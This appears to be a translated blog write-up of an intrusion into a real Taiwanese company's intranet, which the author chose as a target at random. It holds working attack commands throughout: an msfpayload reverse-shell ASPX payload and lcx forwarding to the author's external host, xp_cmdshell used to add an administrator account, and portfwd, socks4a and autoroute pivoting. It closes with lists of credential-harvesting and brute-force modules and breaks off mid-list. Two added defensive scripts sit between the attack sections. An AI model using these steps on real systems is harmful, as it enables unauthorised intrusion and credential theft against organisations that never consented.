
Title: Record once MSF comprehensive application intranet penetration record


0x01 Introduction

I picked a site belonging to a certain Taiwanese technology group at random as the target of this test, purely to learn intranet penetration and the use of MSF. In September 2013 I obtained Webshell access on one subdomain and did not continue testing. At that time Symantec was not installed on the server, but when I came back for a second round of testing I found that Symantec had been installed and some security hardening had been carried out.

0x02 Basic information collection on the website and intranet

Basic information detection:
Target site: http://www.ttes*****.com
Server IP: 59.***.**.74 (Taiwan, Chunghwa Telecom)
Environment platform: ASP.NET
Server system: Microsoft-IIS/6.0 (Windows 2003)

Website subdomain collection: the subdomains in the table are information collected in the early stage; unexpectedly, the Webshell was obtained very smoothly (through FCKeditor). If no vulnerability can be found on the main site, you can start from a "side site" or a "subdomain".

Because this article focuses on the use of the MSF tools and on working through the difficulties encountered, I will not say much about how the Webshell was obtained. The server information collected after obtaining access is as follows.

Open ports: 25, 80, 135, 445, 1025, 1521, 3389
Patch status: the server has 460+ patches installed (64-bit)
Script detection: the server supports the .asp and .aspx extensions
Disk permissions: the C and D drives are (mostly) readable and writeable
The ipconfig /all command shows the host name websrv4, IP 192.168.0.203 and DNS server 192.168.3.1:

Windows IP Configuration
Host Name . . . . . . . . . . . . : websrv4
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.0.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
DNS Servers . . . . . . . . . . . : 192.168.3.1
                                    168.95.1.1

The net view /domain command shows two domains and a workgroup: 7PV1V1S, TT and WORKGROUP; the live hosts in the workgroup and their corresponding IP addresses are shown below.

There are many hosts in the TT domain, so they are listed in a separate table. The domain controller should be 192.168.3.1. From here you can analyse the organisational structure of the workgroup and of each domain, and the role each host plays, based on your own experience.


0x03 Webshell privilege escalation runs into the defense software

The controlled host is running Windows 2003 x64. Although I know there are not many exploits available for x64, I still had to try; the result was that they all failed. I have never dealt with Oracle privilege escalation and don't know much about it, so I put that aside for the time being.

Everyone knows that ASPX and MSSQL are the best partners. I found the database connection information in the web.config file. Here you can see that the MSSQL database runs on the intranet host 192.168.0.206, i.e. the web server and the database server are separate hosts.

<add name="ttes*****_enConnectionString1" connectionString="Data Source=192.168.0.206;Initial Catalog=ttes*****_global;Persist Security Info=True;User ID=sa;Password=tt@12345" providerName="System.Data.SqlClient"/>

Next I used the database management function of the big webshell to connect to MSSQL on the intranet host 192.168.0.206, enabled the xp_cmdshell component to execute commands and add an administrator user, and then forwarded its port 3389 with the portfwd command.

Note: some readers may say that using the port mapping function of the big webshell directly would work, but I never succeeded with it. I wonder whether my technique was wrong. Well, it must have been; I'm still too bad at this!
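As an added example (not part of the original post), here is a small audit script for the web.config finding above: it parses the connectionStrings section and flags a plaintext password, the sysadmin sa login and Persist Security Info=True, the three properties that turned a file read into database and OS access, and treats a section already encrypted with aspnet_regiis as clean. The sample config, its names and the password are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample modelled on the string quoted in the post; the password
# is a placeholder, not the real value.
SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="ttes_enConnectionString1"
         connectionString="Data Source=192.168.0.206;Initial Catalog=ttes_global;Persist Security Info=True;User ID=sa;Password=PLACEHOLDER"
         providerName="System.Data.SqlClient"/>
    <add name="reportsDb"
         connectionString="Data Source=192.168.0.206;Initial Catalog=reports;Integrated Security=SSPI"
         providerName="System.Data.SqlClient"/>
  </connectionStrings>
</configuration>
"""

def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased names."""
    pairs = (p.split("=", 1) for p in cs.split(";") if "=" in p)
    return {k.strip().lower(): v.strip() for k, v in pairs}

def audit_web_config(xml_text):
    """Return (connection name, finding) tuples for risky connection strings."""
    findings = []
    section = ET.fromstring(xml_text).find("connectionStrings")
    if section is None or section.get("configProtectionProvider"):
        # Missing, or already encrypted with 'aspnet_regiis -pe connectionStrings':
        # nothing readable for a Webshell to copy.
        return findings
    for add in section.findall("add"):
        name = add.get("name", "?")
        parts = parse_connection_string(add.get("connectionString", ""))
        if "password" in parts or "pwd" in parts:
            findings.append((name, "plaintext SQL password in web.config"))
        if parts.get("user id", parts.get("uid", "")).lower() == "sa":
            findings.append((name, "uses the sysadmin 'sa' login"))
        if parts.get("persist security info", "").lower() == "true":
            findings.append((name, "Persist Security Info=True exposes the password on the open connection"))
    return findings

if __name__ == "__main__":
    for name, finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(f"{name}: {finding}")
```

The second entry, using Integrated Security with a least-privileged domain account, produces no findings; that is the shape the connection string should have had.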

The test$ administrator user was added successfully, and the next step is to use the Lcx port forwarding tool. Everyone should understand that it is uploaded to and executed on the 203 host, but what is forwarded is port 3389 of the 206 database host.

C:\RECYCLER\lcx.exe -slave <your external IP> 51 192.168.0.206 3389

Notes: on September 13 there was no defense software on the host 192.168.0.203; you could upload Lcx.exe to any readable and writeable directory and run it normally. However, while writing this article I found that Symantec had been installed, and Lcx.exe and the various exploits were blocked during upload. I also tried the usual tricks with Vbs, Bat and Exe (upload, download, changing the extension), and any operation detected as malicious behaviour is blocked.

Symantec Endpoint Protection processes: smc.exe, snac.exe, ccsvchst.exe, rtvscan.exe

By default the risk log of Symantec Endpoint Protection is only kept for 14 days; once inside the server this setting can be changed. In later testing I also found that FCKeditor uploads of Webshells were intercepted too, such as the common one-liner webshell, small webshell, big webshell, etc., as shown in the figure below. You could test more WAF-bypassing webshells to see whether they get past it.

Test record:
1. Intranet environment, web and database on separate hosts; the SA user for the database (192.168.0.206) was found in web.config and an administrator user was added successfully;
2. Symantec is installed on both the web host (192.168.0.203) and the database host (192.168.0.206), so Lcx.exe and similar tools cannot be used;
3. Other forwarding tools were tested and were either intercepted or unusable; reDuh can only forward the current 203 host and is extremely slow;
4. The Exe file generated by msfpayload was also detected; the server is x64 and msfencode has no x64 encoder, so this road is blocked.

0x04 Bypass the defense software for port forwarding

Through a Google search I got the idea from an article: use msfpayload to generate an ASPX reverse-connect script, obtain a meterpreter session, and then use the portfwd command to forward port 3389 of the database server 192.168.0.206.

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=113.***.*.238 LPORT=12345 R | msfencode -t aspx -o "/media/sf_System learning/test.aspx"

Configure the listener options in msfconsole, upload the newly generated test.aspx reverse-connect script to the website's web directory, and then open it in the browser to get a session on the target host.

root@box3:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.7
msf exploit(handler) > set LPORT 12345
msf exploit(handler) > exploit

Then we use the portfwd command to forward the database server 192.168.0.206 in the intranet and can connect to its 3389 remote desktop normally. The relevant command parameters are as follows; I forgot to take a screenshot at the time!

meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.0.206
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.0.206:3389

Usage: portfwd [-h] [add | delete | list | flush] [args]   // add / delete / list / flush, followed by the parameters

OPTIONS:
    -h        Help banner.                              // help
    -L opt    The local host to listen on (optional).   // local IP address
    -l opt    The local port to listen on.              // local port number
    -r opt    The remote host to connect to.            // remote IP address
    -p opt    The remote port to connect to.            // remote port number

Next, let me describe connecting to 3389 in the intranet through MSF's Socks4a proxy. Before starting the Socks4a proxy you must first have a Meterpreter session; then use the socks4a module directly to start the proxy, running it with the default settings.

msf > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVHOST 127.0.0.1
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
msf auxiliary(socks4a) >
[*] Starting the socks4a proxy server

When configuring the proxychains proxy tool you need to add the line "socks4 127.0.0.1 1080" at the bottom of the /etc/proxychains.conf file; it must match the SRVHOST and SRVPORT parameters of the socks4a module.

root@box3:~# vi /etc/proxychains.conf

With the Socks4a proxy started and proxychains configured, we can directly run msf/nmap/sqlmap/nessus/mysql/sqsh/rdesktop/ftp/ssh and other tools through proxychains from the command terminal to scan and test other hosts in the target intranet.

root@box3:~# proxychains msfconsole
root@box3:~# proxychains rdesktop 192.168.0.206

Note: when the Socks4a proxy is started but cannot be used normally, it may be a firewall problem. In that case you can try setting the SRVHOST parameter to 127.0.0.1 (the default is 0.0.0.0, port 1080). Remember not to mix up the proxy server settings and the proxy tool settings!

2014-07-28: after testing again, I found that I couldn't get a reverse connection using the original method. Then I tried reDuh_Gui, reverse_tcp on port 80 and other methods. Everything appeared to connect and the TCP connection state was LISTENING, but the connection was not allowed through or no session came back.

Final breakthrough and follow-up ideas: use the Lcx.exe tool to listen on port 80 locally, disable the Symantec defense software after getting onto the 192.168.0.206 database server, then run the MSF payload and further penetrate other hosts in the intranet.

0x05 Obtaining open ports and system versions on the C segment

In the current session, use the get_local_subnets script to obtain the local subnet, and add a route on the local Kali machine to achieve cross-subnet access. In this way you can directly use the modules of the MSF framework to scan and test other hosts in the target intranet.

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0
meterpreter > run autoroute -s 192.168.0.0/255.255.255.0
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via 59.***.**.66
[*] Use the -p option to list all active routes
// 1 is the session id from sessions; don't get it wrong when adding the route!
msf exploit(handler) > route add 192.168.0.0 255.255.255.0 1
// view all currently active routes
meterpreter > run autoroute -p
msf exploit(handler) > route print

Use the auxiliary/scanner/portscan/tcp module in MSF to batch-scan the ports of the target intranet C segment. This module can easily find the open ports of every host in the C segment, giving us more confidence in the later penetration tests.

Here, the author mainly scans these common ports: 21/22/445/1433/3306/3389 for demonstration. Other more common ports are: 23/25/80/110/135/139/1521/8080/14147/43958, etc.

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.0.1-254
msf auxiliary(tcp) > set PORTS 21,22,445,1433,3306,3389
msf auxiliary(tcp) > set THREADS 50
msf auxiliary(tcp) > exploit

If it is too slow you can increase the thread count appropriately. You need to wait a while during the scan. Afterwards you can use commands such as hosts and services to view the scan results, provided msfconsole is connected to the PostgreSQL database. The port scan results are shown in the figure below.
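From the defender's side, the portfwd relay and socks4a proxy of the previous section and the C-segment port scan in this one share one network signature: every relayed or scanned connection originates from the compromised web server (192.168.0.203 here). The following is an added example, not from the original post, that runs that detection over constructed flow records; the tier mapping, allowlist and record format are assumptions.

```python
from collections import defaultdict

# Constructed flow records (timestamp, src_ip, dst_ip, dst_port); the IPs follow
# the post: 192.168.0.203 is the web server, 192.168.0.206 the database server.
FLOWS = [
    ("2014-07-28T10:00:01", "192.168.0.203", "192.168.0.206", 1433),  # normal app -> DB
    ("2014-07-28T10:05:12", "192.168.0.203", "192.168.0.206", 3389),  # portfwd relay to RDP
    ("2014-07-28T10:06:40", "192.168.0.203", "192.168.0.10", 445),    # portscan through the route
    ("2014-07-28T10:06:41", "192.168.0.203", "192.168.0.11", 445),
    ("2014-07-28T10:06:42", "192.168.0.203", "192.168.0.12", 3389),
    ("2014-07-28T10:07:00", "192.168.3.1", "192.168.0.203", 445),     # DC -> web, not web tier
]

WEB_TIER = {"192.168.0.203"}                          # assumed tier mapping
ALLOWED = {("192.168.0.203", "192.168.0.206", 1433)}  # the only admin-port flow the app needs
ADMIN_PORTS = {22, 135, 445, 1433, 3306, 3389}

def lateral_from_web_tier(flows, fanout_threshold=3):
    """Return one alert per unexpected admin-port connection originating from a
    web-tier host, plus a fan-out alert when one web host reaches many internal
    targets on those ports (what the portscan module looks like through a pivot)."""
    alerts = []
    targets = defaultdict(set)
    for ts, src, dst, dport in flows:
        if src not in WEB_TIER or dport not in ADMIN_PORTS:
            continue
        if (src, dst, dport) in ALLOWED:
            continue
        alerts.append(f"{ts} {src} -> {dst}:{dport} unexpected admin-port connection from web tier")
        targets[src].add(dst)
    for src, dsts in targets.items():
        if len(dsts) >= fanout_threshold:
            alerts.append(f"{src} reached {len(dsts)} internal hosts on admin ports (possible pivot or scan)")
    return alerts

if __name__ == "__main__":
    for line in lateral_from_web_tier(FLOWS):
        print(line)
```

The same rule, written as an egress filter on the web tier instead of a detection, would have stopped the relay in the first place: a web server has no reason to open RDP or SMB to anything.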

We can also use the following modules to detect live hosts, system version, software version, computer name, MAC address, workgroup or domain, etc. Only some commonly used modules are listed here; the picture is from @OffSec!

auxiliary/scanner/portscan/tcp

auxiliary/scanner/portscan/ack

auxiliary/scanner/portscan/syn

auxiliary/scanner/ftp/ftp_version

auxiliary/scanner/ssh/ssh_version

auxiliary/scanner/smb/smb_version

auxiliary/scanner/dns/dns_amp

auxiliary/scanner/http/title

auxiliary/scanner/http/http_version

auxiliary/scanner/telnet/telnet_version

auxiliary/scanner/mysql/mysql_version

auxiliary/scanner/postgres/postgres_version

auxiliary/scanner/netbios/nbname

auxiliary/scanner/netbios/nbname_probe //Deleted

auxiliary/scanner/discovery/arp_sweep

auxiliary/scanner/discovery/udp_probe

auxiliary/scanner/discovery/udp_sweep

[.SNIP.]

0x06 Common Service Brute-Force Module

Collect more user names, passwords and other information from the hosts you already have access to, including third-party software, SSH/RDP, and user passwords stored in various websites/databases, text files or spreadsheets, then analyse them to see whether there are patterns or common elements. If there are, we can generate an efficient dictionary from those patterns and use the following modules for brute-forcing and exploitation. The picture comes from @OffSec!

Note: some modules were newly added when re-editing this article. Since it has been reorganised anyway, why not add a few more? My obsessive-compulsive side strikes again! I also use these frequently. If the masters have other commonly used modules, feel free to add them.

auxiliary/scanner/ftp/anonymous
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/dos/windows/ftp/filezilla_admin_user
auxiliary/dos/windows/ftp/filezilla_server_port
post/windows/gather/credentials/flashfxp
post/windows/gather/credentials/smartftp
post/windows/gather/credentials/wsftp_client
post/windows/gather/credentials/filezilla_server
post/windows/gather/credentials/xshell_xftp_password
post/multi/gather/filezilla_client_cred
auxiliary/scanner/smb/smb_login
auxiliary/admin/smb/upload_file
exploit/windows/smb/psexec
exploit/windows/smb/ms08_067_netapi
auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_psexec
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/webexec
auxiliary/admin/smb/webexec_command
auxiliary/scanner/smb/impacket/wmiexec
auxiliary/admin/mysql/mysql_enum
auxiliary/admin/mysql/mysql_sql
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_hashdump
exploit/windows/mysql/mof
exploit/multi/mysql/mysql_udf_payload
auxiliary/admin/mssql/mssql_enum
auxiliary/admin/mssql/mssql_exec
auxiliary/admin/mssql/mssql_sql
auxiliary/admin/mssql/mssql_escalate_dbowner
auxiliary/scanner/mssql/mssql_ping
auxiliary/scanner/mssql/mssql_login
auxiliary/scanner/mssql/mssql_hashdump
exploit/windows/mssql/mssql_clr_payload
exploit/windows/mssql/mssql_payload
post/windows/gather/enum_termserv
post/windows/gather/credentials/mremote
auxiliary/scanner/rdp/ms12_020_check
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
auxiliary/scanner/rdp/cve_2019_0708_bluekeep
exploit/windows/rdp/
